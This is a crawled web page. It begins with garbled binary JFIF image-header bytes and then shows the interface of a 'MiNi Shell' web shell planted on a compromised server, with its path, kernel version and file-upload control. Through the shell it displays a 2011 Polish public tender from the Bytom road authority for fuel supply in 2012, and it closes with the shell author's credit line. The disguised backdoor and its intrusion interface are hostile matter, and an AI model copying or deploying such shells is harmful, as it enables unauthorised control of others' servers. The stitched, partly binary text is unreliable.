JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/397374-N-2011.html

<p class="kh_header"><b>Bytom: Dostawa paliw w 2012r.</b><br>
<b>Numer ogłoszenia: 397374 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bytom - Miejski Zarząd Dróg i Mostów , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 032 3969700, faks 032 3969702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzdim.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw w 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1:
1.	Przedmiotem zamówienia w zakresie tego zadania jest dostawa paliw na potrzeby MZDIM Bytom obejmująca zakup benzyny bezołowiowej 95 oktanowej w ilości do 10 000 litrów oraz oleju napędowego w ilości do 47.000 litrów  w 2012r., przy czym Zamawiający zastrzega sobie prawo zakupu mniejszej ilości każdego z w/w paliw, a Wykonawcy nie przysługują z tego tytułu roszczenia względem Zamawiającego, o ile ilość zakupionych paliw będzie wynosić co najmniej 70% ilości zadeklarowanych. 
2.	Podane w SIWZ i załącznikach do SIWZ ilości zakupywane paliwa są orientacyjne (szacunkowe), mają służyć  do porównania ofert i dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od faktycznych potrzeb Zamawiającego. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie zakupionego paliwa i cen z dnia zakupu (z uwzględnieniem zaoferowanego upustu), do maksymalnego zobowiązania Zamawiającego wynikającego z umowy (tj. oszacowanej wartości zamówienia powiększonej o podatek VAT).
3.	Zakupy odbywać się będą na zasadach doraźnych, poprzez sukcesywne, bezgotówkowe tankowanie benzyny bezołowiowej 95 oraz oleju napędowego do zbiorników pojazdów i urządzeń Zamawiającego na stacjach Wykonawcy.
4.	Olej napędowy winien spełniać wymagania jakościowe określone w załączniku nr 2 do Rozporządzenia Ministra Gospodarki 09.12.2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008r., Nr 221, poz.1441), natomiast benzyna bezołowiowa 95 oktanowa winna spełniać wymagania jakościowe określone w załączniku nr 1 do Rozporządzenia Ministra Gospodarki 9.12.2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008r., Nr 221, poz.1441).
5.	Zakup będzie odbywać się za pomocą dwudziestu kart paliwowych wydanych Zamawiającemu przez Wykonawcę, przy użyciu których odbywać się będzie bezgotówkowe tankowanie, przy czym 15 kart przypisanych zostanie do poszczególnych pojazdów, a pozostałych 5 wystawionych zostanie w celu realizacji dostaw odpowiednio oleju napędowego i benzyny bezołowiowej, służących do zasilania pozostałych urządzeń.
6.	Zakup paliw spełniających wymagania jakościowe będzie odbywać się według cen detalicznych obowiązujących w dniu zakupu paliwa na danej stacji paliw, z uwzględnieniem stałego, określonego upustu zaoferowanego w ofercie. 
7.	Rozliczenia zawartych transakcji odbywać się będą dwa razy w miesiącu - za okresy od 1 do 15 dnia miesiąca i od 16 dnia do końca miesiąca.
8.	Rozliczenie każdorazowej transakcji bezgotówkowego tankowania powinno zostać potwierdzone wydrukiem z terminalu, który winien zawierać: numer karty, numer rejestracyjny pojazdu, datę i godzinę transakcji oraz miejsce, nazwę produktu, ilość zatankowanego paliwa i całkowitą wartość transakcji (brutto i netto). Ponadto wykonawca będzie udostępniał Zamawiającemu wskazane powyżej informacje poprzez umieszczenie ich na stronie internetowej Wykonawcy i przekazanie Zamawiającemu hasła, za pomocą którego będzie możliwe odczytanie przedmiotowych transakcji. 
9.	Termin wykonania zamówienia: od dnia zawarcia umowy (przy czym nie wcześniej niż od 01.01.2012r.) do dnia 31.12.2012r.

Zadanie nr 2 
10.	Przedmiotem zamówienia w zakresie tego zadania jest zakup: benzyny bezołowiowej 95 oktanowej w ilości do 700 litrów, benzyny bezołowiowej 98 oktanowej w ilości do 12.000 litrów oraz oleju napędowego w ilości do 13.000 litrów w 2012r., przy czym Zamawiający zastrzega sobie prawo zakupu mniejszej ilości każdego z w/w paliw, a Wykonawcy nie przysługują z tego tytułu roszczenia względem Zamawiającego, o ile ilość zakupionych paliw będzie wynosić co najmniej 70% ilości zadeklarowanych. 
11.	Podane w SIWZ i załącznikach do SIWZ ilości zakupywane paliwa są orientacyjne (szacunkowe), mają służyć  do porównania ofert i dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od faktycznych potrzeb Zamawiającego. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie zakupionego paliwa i cen z dnia zakupu (z uwzględnieniem zaoferowanego upustu), do maksymalnego zobowiązania Zamawiającego wynikającego z umowy (tj. oszacowanej wartości zamówienia powiększonej o podatek VAT).
12.	Zakupy odbywać się będą na zasadach doraźnych, poprzez sukcesywne, bezgotówkowe tankowanie oleju napędowego oraz benzyny bezołowiowej 95 i 98 oktanowej do zbiorników pojazdów i urządzeń Zamawiającego na stacjach Wykonawcy.
13.	Olej napędowy winien spełniać wymagania jakościowe określone w załączniku nr 2 do Rozporządzenia Ministra Gospodarki 9.12.2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008r., Nr 221, poz.1441) natomiast benzyna bezołowiowa 95 i 98 oktanów winna spełniać wymagania jakościowe określone w załączniku nr 1 do Rozporządzenia Ministra Gospodarki 9.12.2008r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2008r., Nr 221, poz.1441).
14.	Zakup będzie się odbywał za pomocą 13 kart paliwowych wydanych Zamawiającemu przez Wykonawcę, przy użyciu których odbywać się będzie bezgotówkowe tankowanie, przy czym 10 kart przypisanych zostanie do poszczególnych pojazdów, a 3 karty wystawione zostaną w celu realizacji dostaw służących do zasilania pozostałych urządzeń. 
15.	Zakup paliw spełniających wymagania jakościowe będzie się odbywał według cen detalicznych obowiązujących w dniu zakupu paliwa na danej stacji paliw, z uwzględnieniem stałego, określonego upustu zaoferowanego w ofercie. 
16.	Rozliczenia zawartych transakcji odbywać się będą dwa razy w miesiącu - za okresy od 1 do 15 dnia miesiąca i od 16 dnia do końca miesiąca.
17.	Rozliczenie każdorazowej transakcji bezgotówkowego tankowania powinno zostać potwierdzone wydrukiem z terminalu, który winien zawierać: numer karty, numer rejestracyjny, datę godzinę transakcji i miejsce, nazwę produktu, ilość zatankowanego paliwa i całkowitą wartość transakcji (brutto i netto). Ponadto wykonawca będzie udostępniał Zamawiającemu wskazane powyżej informacje poprzez umieszczenie ich na stronie internetowej wykonawcy i przekazanie Zamawiającemu hasła, za pomocą którego będzie możliwe odczytanie przedmiotowych transakcji.
18.	Termin wykonania zamówienia: od dnia zawarcia umowy (przy czym nie wcześniej niż od 01.01.2012r.) do dnia 31.12.2012r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w następujących kwotach:
Zadanie nr 1 -  w kwocie 7.200,00 zł (słownie: siedem tysięcy dwieście złotych),
Zadanie nr 2 -  w kwocie 3.100,00 zł (słownie: trzy tysiące sto złotych),
2.	Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 ustawy.
3.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego - tj. Gmina Bytom - Miejski Zarząd Dróg i Mostów, 41-902 Bytom ul. Smolenia 35), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją,  
3)	kwotę gwarancji,
4)	okres ważności gwarancji (nie może być krótszy niż okres związania ofertą),
5)	oświadczenie gwaranta, w którym zobowiązuje się on nieodwołalnie do bezwarunkowej zapłaty kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek zatrzymania wadium wymienionych w ustawie Prawo zamówień publicznych.
Powyższe zapisy stosuje się również do poręczeń wskazanych w art. 45 ust 6 pkt 2 i 5 ustawy.
Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek Zamawiającego: Getin Noble Bank S.A. O/Bytom: 43 1560 1049 0000 9030 0026 9731.  
	Do oferty należy dołączyć kopię polecenia przelewu.
4.	Wadium wnoszone w innych dopuszczalnych formach należy w oryginale złożyć w siedzibie Zamawiającego - 41-902 Bytom, ul. Smolenia 35 (III piętro - pok. nr 25 - Dział Zamówień Publicznych), a kopię wadium dołączyć do oferty.  
5.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi wpływ środków na rachunek Zamawiającego i uznanie środków na tym rachunku przed upływem terminu składania ofert.
6.	Zamawiający zwraca wadium  w przypadkach wymienionych w art. 46 ustawy. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 1a ustawy.
7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
Wykonawca winien posiadać koncesję na wykonywanie działalności gospodarczej w zakresie obrotu paliwami ciekłymi, zgodnie z ustawą z dnia 10 kwietnia 1997r. - Prawo energetyczne (tj. Dz. U. z 2006r., Nr 89, poz. 625 z późn. zm.), 


Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. IV SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku:
a/ dla Zadania 1 - Wykonawca winien dysponować co najmniej 100 stacjami paliw na terenie całej Polski,                 w tym co najmniej 1 stacją paliw na terenie miasta Bytom lub w odległości nie większej niż 5 km liczonej                  w linii prostej od siedziby Zamawiającego tj. dla Zadania 1 - Bytom ul. Smolenia 35;
b/ dla Zadania 2 - Wykonawca winien dysponować co najmniej 100 stacjami paliw na terenie całej Polski,                   w tym co najmniej 1 stacją paliw na terenie miasta  Bytom lub w odległości nie większej niż 5 km liczonej                w linii prostej od siedziby Zamawiającego tj. dla Zadania 2 - Bytom ul. Parkowa 2. 


Zamawiający oceni spełnianie w/w warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. IV SIWZ, które weryfikowane będą wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany:
1)	Zamawiający przewiduje możliwość zmiany stron umowy tj. następstwo prawne wynikające z odrębnych przepisów,
2)	zmiany rodzaju i ilości pojazdów, w razie zaistnienia takich zmian po stronie Zamawiającego w ciągu roku 2012, a co za tym idzie - anulowanie dotychczasowych lub wydanie nowych kart do transakcji bezgotówkowych,
3)	zwiększenia ilości zakupywanych paliw (dla każdego rodzaju paliwa oddzielnie) jeżeli nie powoduje to zmiany maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikający z umowy,
4)	w sytuacjach, gdy nastąpią zmiany w wysokościach i sposobie płatności należności publiczno - prawnych poprzez dostosowanie treści umowy do obowiązujących przepisów, a w szczególności w przypadku zmiany obowiązujących przepisów dotyczących  podatku VAT,
5)	możliwość dokonania zmiany podwykonawców lub części wykonywanego przez niego zakresu zamówienia, bądź wprowadzenie nowego podwykonawcy.
2.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia zmiany przez Zamawiającego.
3.	Jakiekolwiek zmiany umowy pod rygorem nieważności wymagają zachowania formy pisemnej w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzdim.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg i Mostów, 41-902 Bytom, ul. Smolenia 35 (III piętro - Dział Zamówień Publicznych - pok. nr 25).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 10:00, miejsce: Miejski Zarząd Dróg i Mostów, 41-902 Bytom, ul. Smolenia 35 (III piętro - Dział Zamówień Publicznych - pok. nr 25).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa paliw na potrzeby MZDIM Bytom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia w zakresie tego zadania jest dostawa paliw na potrzeby MZDIM Bytom obejmująca zakup benzyny bezołowiowej 95 oktanowej w ilości do 10 000 litrów oraz oleju napędowego w ilości do 47.000 litrów  w 2012r., przy czym Zamawiający zastrzega sobie prawo zakupu mniejszej ilości każdego z w/w paliw, a Wykonawcy nie przysługują z tego tytułu roszczenia względem Zamawiającego, o ile ilość zakupionych paliw będzie wynosić co najmniej 70% ilości zadeklarowanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa paliw na potrzeby Urzędu Miejskiego w Bytomiu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 10.	Przedmiotem zamówienia w zakresie tego zadania jest zakup: benzyny bezołowiowej 95 oktanowej w ilości do 700 litrów, benzyny bezołowiowej 98 oktanowej w ilości do 12.000 litrów oraz oleju napędowego w ilości do 13.000 litrów w 2012r., przy czym Zamawiający zastrzega sobie prawo zakupu mniejszej ilości każdego z w/w paliw, a Wykonawcy nie przysługują z tego tytułu roszczenia względem Zamawiającego, o ile ilość zakupionych paliw będzie wynosić co najmniej 70% ilości zadeklarowanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.13.21.00-4, 09.13.41.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com